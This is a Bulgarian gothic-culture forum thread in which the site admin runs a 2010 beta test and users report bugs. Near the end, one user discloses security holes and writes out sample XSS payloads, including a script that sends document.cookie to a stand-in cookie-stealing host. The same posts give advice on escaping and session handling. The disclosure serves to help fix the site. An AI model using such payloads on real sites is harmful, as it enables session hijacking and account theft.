|
 |
www.gothic.bgБългарският портал за готик култура, музика, изкуство |
|
| Автор |
Съобщение |
|
Silentium
|
Заглавие: www.gothic.bg v2 Beta Test Публикувано на: Вто Фев 02, 2010 9:19 pm |
|
 |
| The Ol'Mighty Admin |
 |

|
www.gothic.bg version 2 BetaИ така, започваме. Да видим какъв ще е резултатът. Днес го пускам само във форума. Но утре ще го обявя и на сайта, не, че очаквам някакъв наплив :Д След малко ще пратя потребителското име и на парола на петимата души, които имат акаунти на сайта. Можете да ми пишете за всякакви проблеми; грешки, които възникват като браузвате; неща, които трябва, но не можете да направите; неща, които не би трябвало да можете, но правите; въобще всичко, за което се сетите. Използвайте тази тема, бъг формата в настройките на акаунта ви там или на пощата ни, която се намира от линк най-долу на сайта. Пишете коментари по ревютата на албумите, пращайте ни статии (за авторите), за да видим дали и това работи както трябва, добавяйте се и се трийте от миналите събития (или към предстоящите, ако има такива). Променяйте си настройките, опитвайте да качите аватар (това не съм тествал на сървъра, където е качен сайтът; на моята машина работеше перфектно, но е много възможно на сървъра да не е толкова добре, защото може да съм пропуснал да променя пътя до директорията, в която се качват аватарите и снимките за статиите). Спокойно ни пращайте глупости и копирани статии от друга сайтове. Всичко е в името на теста. Базата данни, която е в момента, на бета сайта, няма да се ползва в последствие на лайв. Така, че спокойно правете каквото си искате там  После ще я затрия цялата така или иначе. Лично аз забелязах един проблем още при логването, а именно, че като си напишете потребителското име и паролата и натиснете бутончето, трябва да ви прати на страницата с настройките, ама на сървъра ви праща на главната страница (за справка, на моята машина си редиректва където трябва), но това ще го мъча утре. Всеки, който желае да стане част от бета тестинга на сайта ни, може да ми пише или просто да заяви желанието си в тази тема (очаквам обаче поне малко сериозност). Акаунт ще получи и, ако наистина е влизал в сайта и е отчел някаква дейсност (а аз ще разбера, повярвайте ми :Д), ще запази акаунта си и след това, а може да получи и бонус точки, ако е докладвал за проблеми. Имайте в предвид, че от март регистрацията на нови потребители на сайта няма да е толкова лесна  Ами, май това беше от мене.Всичко е във вашите ръце 
|
 |
|
suicide_fetish
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Вто Фев 02, 2010 10:03 pm |
|
 |
| HippieGoth |
 |
Регистриран на: Вто Апр 07, 2009 6:38 pm Мнения: 544 Тип Goth: XOTOXIC Репутация: 9

|
|
Тва горе дясно с човечЕнцето не изглежда много на място
|
|
 |
|
 |
|
Silentium
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Сря Фев 03, 2010 12:08 am |
|
 |
| The Ol'Mighty Admin |
 |

|
Нямам време и желание да направя някакви по-тъмни и "мрачни" иконки за момента  Но за лайв версията през март ще се променят (надявам се)  Просто... трябваше да има нещо и намерих еднакви иконки (в смисъл с един и същи дизайн), които да ползвам за login, logout, settings и view profile 
|
 |
|
inaccessibility
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Сря Фев 03, 2010 3:18 am |
|
 |
| The Ol'Mighty Admin |
 |
Регистриран на: Пет Апр 03, 2009 1:53 pm Мнения: 173 Местоположение: Sofia Репутация: 6

|
|
Значи, добавянето към събития е ок, поне при мен. Това с логването и препращането към профилната страница не мисля, че е някакъв супер огромен проблем. Ок е примерно, че запомня паролата, ако искаш да я смениш. А не е необходима, ако искаш да си смениш аватара, и се налага да се изтрива от полето, което е излишно. Освен това не видях да е заредил нито един от качените ми тестващи аватари. Възможно това да е някакъв проблем.
Ще се пробвам да кача някаква био за проба сега. (:
Това е засега...
_________________ |fato perfunctus|
|
|
 |
|
 |
|
Silentium
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Сря Фев 03, 2010 10:06 am |
|
 |
| The Ol'Mighty Admin |
 |

|
Мда, аватрите не се качват, както и предположих... То това означава, че и всички други снимки (за статиите) също няма да се качват... После ще го оправя това и ще погледна и другите неща... Мерси 
|
 |
|
Arc
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Сря Фев 03, 2010 11:18 am |
|
 |
| Victorian Goth |
 |
Регистриран на: Пет Апр 03, 2009 1:23 pm Мнения: 217 Местоположение: 8th sky Репутация: 15

|
Добре значи всичко което забелязах като бъгове е отчетено вече,нямам много време да пиша статии и т.н. , но за сметка на това след 4 дни съм свободен до март месец 
_________________ Requiem Æternam...
|
|
 |
|
 |
|
Silentium
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Сря Фев 03, 2010 5:11 pm |
|
 |
| The Ol'Mighty Admin |
 |

|
Arc, като казваш отчетено, пратил ли си ги някъде или не си споменавал? А иначе аватарите ги оправих... Както и предположих, бях забравил една директория в пътя  Върнах ви старите noavatar стойности... Опитайте сега, трябва да работи вече... Надявам се :Д Поне аз успях да си сменя аватара... бтв, за целта на тестовете, никой не иска от вас реални и смислени статии  Аз искам да пращате каквото и да е (копи-пейст) от някой сайт, за да видя дали работи правилно системата  Както казах, базата ще бъде нулирана като я кача на лайв март месец... та всички статии и коментари ще си заминат...
|
 |
|
suicide_fetish
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Сря Фев 03, 2010 6:02 pm |
|
 |
| HippieGoth |
 |
Регистриран на: Вто Апр 07, 2009 6:38 pm Мнения: 544 Тип Goth: XOTOXIC Репутация: 9

|
|
Дуууд, мисля че не е добра идея в прозореца с настройки паролата и повтарянето на паролата (особено лоллл) да са с видими букви.
Качването на картинка 96х52 jpg за аватар не ми работи, но май не се и очаква, райт?
Каритнките "Новини", "Новини", "Новини" и "Архиви" на първата страница ми се показват покрити отгоре с малко черно от разделителя под тях. Widescreen, 1440х1050 или нещо такова ми е резолюцията. И не разбирам защо тряя да има 3 картинки "Новини", вероятно си копипейстнал и после те е мързяло да сложиш "Събития" и още нещо на другите?
Няма никъде линк към онази система за постване на нещо, като че ли.
Пратих бъг рипорт, получи ли се?
Това "видове готи" можеш да го махнеш може би - много е смешно.
Картинката-банер горе тряя да е хиперлинк към сайта, за да могат хората да си я слагат на разни места.
|
|
 |
|
 |
|
Silentium
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Сря Фев 03, 2010 6:48 pm |
|
 |
| The Ol'Mighty Admin |
 |

|
suicide_fetish написа: Дуууд, мисля че не е добра идея в прозореца с настройки паролата и повтарянето на паролата (особено лоллл) да са с видими букви. Честно казано го бях направил първоначално да не се вижда, ама сметнах, че е по-добре като пишеш парола, да виждаш реално какво пишеш, че да не се окаже, че пишеш глупости и после да не се сетиш какво точно си написал (и нищо не пречи и дватата пъти да напишеш нещо различно от това, което си мислиш, че пишеш :Д) Но ако наистина смятате, че така трябва, ще го направя да не се вижда  suicide_fetish написа: Качването на картинка 96х52 jpg за аватар не ми работи, но май не се и очаква, райт?
Гледам, че ти е ок аватарът. В смисъл имаш качен някакъв. По някога, като качиш снимка и страницата се рефрешне, не се визуализира както трябва. Не знам защо става така, но ако пак рефрешнеш, ще е там. Поне аз мога да видя аватар в профила, а и преди малко уж оправих качването :Д Чек аген  suicide_fetish написа: Каритнките "Новини", "Новини", "Новини" и "Архиви" на първата страница ми се показват покрити отгоре с малко черно от разделителя под тях. Widescreen, 1440х1050 или нещо такова ми е резолюцията. И не разбирам защо тряя да има 3 картинки "Новини", вероятно си копипейстнал и после те е мързяло да сложиш "Събития" и още нещо на другите?
Хм, това с препокриването явно ще трябва да го видя на някой по-светъл монитор, че на моя не се вижда както трябва :Д Довечера ще прегледам как стоят нещата с това. А що се отнася до надписа... Не, така си е... Просто има място за три пъти новини. Просто това са новините от сайта - тоест какво е качвано... Ама то това си го имаше цяла година ;Д suicide_fetish написа: Няма никъде линк към онази система за постване на нещо, като че ли.
Ами на тебе съм ти направил потребителски акаунт. Той ти е един вид бонус заради участието в играта от януари. Не си казал, че искаш авторски и затова...  И по принцип потребителите не виждат бутоните за добавяне на статии и прочие. Но само кажи, ако искаш ще ти променя групата на акаунта  suicide_fetish написа: Пратих бъг рипорт, получи ли се?
Мда  suicide_fetish написа: Това "видове готи" можеш да го махнеш може би - много е смешно.
Това не ми стана много ясно. За какво по-точно говориш? За статията във FAQ-то ли? suicide_fetish написа: Картинката-банер горе тряя да е хиперлинк към сайта, за да могат хората да си я слагат на разни места. По принцип картинката горе трябва да е сменящ се банер на различните сайтове с, които сме affiliates. Но тъй като за момента такива няма, няма и банери :Д Иначе там трябва да се появява банер на наши "приятели" с линк към страницата им. Ако някой иска наш банер, може да си копира един от Links секцията. Ако съм разбрал правилно какво имаш предвид де 
|
 |
|
suicide_fetish
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Чет Фев 04, 2010 11:50 am |
|
 |
| HippieGoth |
 |

|
|
Уууу найс, еми добре значи сичко наред ya i want cheesy poofs! Само тва с видове готи остана - йе, то е във FAQ и изглежда много смешно срсли... едно нещо е културата да създава предразсъдъци към хората които я следват, и друго е това ужасно разделение. И изглежда написано от някой много млад човек )). Кой го е писал? А авторски акаунт не искам ако не съм заслужил :p - просто ти спомена че трябва да пробваме да пускаме статии.
|
|
 |
|
 |
|
Aurora
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Чет Фев 04, 2010 12:05 pm |
|
 |
| Turning Goth |
 |

|
|
За албумите не е зле да се показва кой е правил ревю-то...все пак различни хора, различно оценяване...
|
|
 |
|
 |
|
Silentium
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Чет Фев 04, 2010 2:39 pm |
|
 |
| The Ol'Mighty Admin |
 |

|
@suicide_fetish Статията си е статия и е част от FAQ-то няма как  А разделението си е факт, но то не е разделение в смисъла на нещо разделено, а просто хората се обособяват по един или друг начин... Както стиловете, примерно...  А иначе то е хубаво да се тестват и различните видове акаунти, че може някои проблеми да възникват при един, а други при друг... Но пак повтарям, ако искаш да си автор, ще ти дам такъв достъп :Д Сега е времето да си искате, че после... няма  А иначе сега правя форма, с която потребителите ще могат да кандидатстват за автори... @Aurora Мисля, че това го споменах в другата тема, ама може и да не съм, не помня вече :Д Самата колонка с потребителското име е готова и написана в кода, просто съм я коментирал. Причината е, че в момента всичките ревюта на албуми, които виждате там, са писани от мене (предимно за блога ми), като някои доста преди самия сайт и си личи по краткостта или прекалено глупаво написания стил :Д Та като получа повечко ревюта от други потребители, ще я разкоментирам. Просто не ми хареса как само моето име се мъдри сред всичките ревюта...
|
 |
|
suicide_fetish
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Чет Фев 04, 2010 2:48 pm |
|
 |
| HippieGoth |
 |

|
|
Аз не съм за сепаратизма на тва, защото очевидно такъв няма, а за поставянето на етикети - което е тиинейджърска работа и създава ненужни предразсъдъци. Но не е от особено значение, ако се вписва във вашите представи за света като нещо поносимо :Р. Не е важно какво е правилно по принцип, а какво е правилно за мнозинството. Кво беше златното правило на Кант? Не че ще знаете лол... Ми хората не ми се кефят когато пиша някви неща, а не виждам да има смисъл да превеждам неща, колкото и да съм добър в това - така че май няма нужда да ме слагаш за автор. Освен това ако ще пиша нещо ще съм непоносимо критичен, защото музиката е едно от най-важните неща в живота ми, а аз си приемам живота много насериозно. Тей че да пишат по-добре тия които вярват в богове и си губят живота със съвременно кино и популярна музика (ето един добър пример защо не ми трява авторски акаунт :Р).
|
|
 |
|
 |
|
Silentium
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Чет Фев 04, 2010 2:59 pm |
|
 |
| The Ol'Mighty Admin |
 |

|
Ако ми пукаше особено и се засягах лесно, щях да кажа, че и мене поставяш в тази категория, защото голяма част от материалите вътре са мои :Д То аз като те слушам, ти даже и акаунт не искаш въобще, ама както и да е  А иначе не знам разбрах какво точно има златното правило за справедливото отношение (най-общо казано де). Или може би, че с тази статия намекваш, че не сме справедливи спрямо хората, на които поставяме етикети ли?:ДДД Но това не е тема за разговор в тази тема. Та нека не я пълним с повече офтопик 
|
 |
|
suicide_fetish
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Чет Фев 04, 2010 5:28 pm |
|
 |
| HippieGoth |
 |

|
|
 |
|
 |
|
Silentium
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Чет Фев 04, 2010 5:44 pm |
|
 |
| The Ol'Mighty Admin |
 |

|
Въртят ми се следните неща из главата  Коментари под събитията Оценка на статия и/или ревю от 1 до 5 Добавяне на приятели Пълен списък с потребителите с възможности за филтриране Допълнителни опции за въвеждане на информация в профила - като профили към фейсбук/май спейс/ласт.фм и прочие Писане на съобщения м/у потребителите Някой да иска тези неща или не са ви нужни :Д И въобще ако имате и вие някакви идеи и/или желания по сайта, казвайте ги, не се стеснявайте :Д Ако ми хареса идеята и мога да я реализирам, ще го направя  Оправих "Публиката" към събитията, защото се оказа, че като има повече от един човек и не се подреждат добре иконките :д И тъй като тази вечер мисля да мръдна до София за партито на дарк френдс, а утре съм на работа, няма да пипам нищо тези дни  Та другата седмица продължавам  Edit: Един бърз ъпдейт. Благодарение на Aurora, която снощи е качвала статии, открих два бъга - то не са толкова бъгове, колкото недоглеждания, които ще оправя по-късно, ако остане време или понеделник най-вероятно 
|
 |
|
Aurora
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Чет Фев 04, 2010 10:27 pm |
|
 |
| Turning Goth |
 |

|
|
Айде gothic.bg да не става сайт за запознанства...
|
|
 |
|
 |
|
B.T.
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Съб Фев 06, 2010 2:56 am |
|
 |
| Corporate Slave Goth |
 |
Регистриран на: Съб Яну 16, 2010 3:22 am Мнения: 363 Местоположение: Deutschland Тип Goth: Зимен goth Репутация: 11

|
Пратил съм ти report за някои много важни дупчици по сайта. Също така в зависимост от версията на live server-а (тоя на gothic.bg), разгледай как се escape-ват string-овете и обърни особено внимание на страниците, където имаш страници и ползваш примерно LIMIT $pg,10. Предполагам сървъра ти не е с php6, където magic_quotes е deprecated, но все пак не е лошо, ако го нямаш пуснат (което не е толкова фрапантно всъщност), да разгледаш функцията mysql_real_escape_string(). За друго сериозно не се сещам. Също така (въпреки че надали български hosting provider го предлага), ако имаш ImageMagick, ползвай него за resize на картинките. В противен случай може да се задоволиш с GD-то (не ми направи впечатление дали картинките за статия се resize-ват от html-а или ползваш crop и resize на GD, но може и над това да се помисли). Относно дупките, за които ти споменах в report-а: много хубаво прегледай навсякъде дали < и > се заместват с < и >. В това число дори hidden полетата, които има възможност да "цъфнат" някъде по html-а с вече променено value. Не забравяй, че една форма може да се прати както от твоя "Запиши" бутон, така и от съвсем друго място, където да се зададат параметри, които script-овете ти да не очакват. Примерно ако можем да си посочваме град, в който живеем със select field и db-то е поле от тип CHAR, мога да си напиша всичко в полето по този метод. Това може да се използва катко за бъзик, така и за по-сериозни неща като: Код: <script src="http://site.com/xss-ataka.js></script>
<!-- ето и нещо по-сериозно като пример, което хич няма да ти хареса да се появи на официалния сайт --> <script> document.location = ‘http://site.com/cookie-steal.php?cookies=’ + document.cookie </script>
Хайде, стига лекции, надявам се да съм ти бил полезен. И оправи страницата дето я развалих с XSS-а, не беше нарочно.  Писах ти ги и тука нещата за всеки случай ако не си получил report-а.
_________________ Birjt injiia, dorantijr Curtizo. Birjt injiia, iranti Curtizo...
|
|
 |
|
 |
|
B.T.
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Съб Фев 06, 2010 3:19 am |
|
 |
| Corporate Slave Goth |
 |
Регистриран на: Съб Яну 16, 2010 3:22 am Мнения: 363 Местоположение: Deutschland Тип Goth: Зимен goth Репутация: 11

|
И един функционален бъг. Нарочно ти го пиша само тук, защото не знам как разпознава скрипта за report апострофите и да не ме разбереш погрешно. Ако групата има ' в името си - примерно Old Man's Child, когато проверяваш в db-то за вече съществуваща добавена група, се получава проверка от тип Old Man\'s Child срещу Old Man's Child. За да избегнеш това, можеш да ползваш следния пример: <?php //... $band = $_GET['add_band']; $band_db = stripslashes($result['band_name']); if($band==$band_db) { //... } //... ?> Използвай stripslashes навсякъде, където може да се пише текст, защото ще виждаме \' вместо ' на много места. Или замествай в GET и POST променливите всички специални символи с html кодовите еквиваленти. Ето ти едно помощно средство, за да вземеш необходимите кодове. Освен това пазиш в hidden поле id-то на потребителя. Това го коментирах на дълго и на широко в предния пост, ама познай дали не мога да публикувам нещо от твое име.  Пази id-то в session-а, малко по-добре ще изглеждат нещата; и винаги при публикуване на нещо, проверявай потребителят дали съществува спрямо id и парола или дори id, user и парола, а не само user и парола, защото манипулации с id се правят много лесно при попълване на content от потребители и може да се използва за лоши и отмъстителни цели. 
_________________ Birjt injiia, dorantijr Curtizo. Birjt injiia, iranti Curtizo...
|
|
 |
|
 |
|
Silentium
|
Заглавие: Re: www.gothic.bg v2 Beta Test Публикувано на: Пон Фев 08, 2010 11:24 am |
|
 |
| The Ol'Mighty Admin |
 |

|
|
Мерси за съветите... По-късно (или утре) ще пиша на лично, че да не занимаваме хората с ненужни подробности :Д
|
 |
|
Потребители разглеждащи този форум: 0 регистрирани |
| |
|
|
Вие не можете да пускате нови теми Вие не можете да отговаряте на теми Вие не можете да променяте собственото си мнение Вие не можете да изтривате собствените си мнения Вие не можете да прикачвате файл
|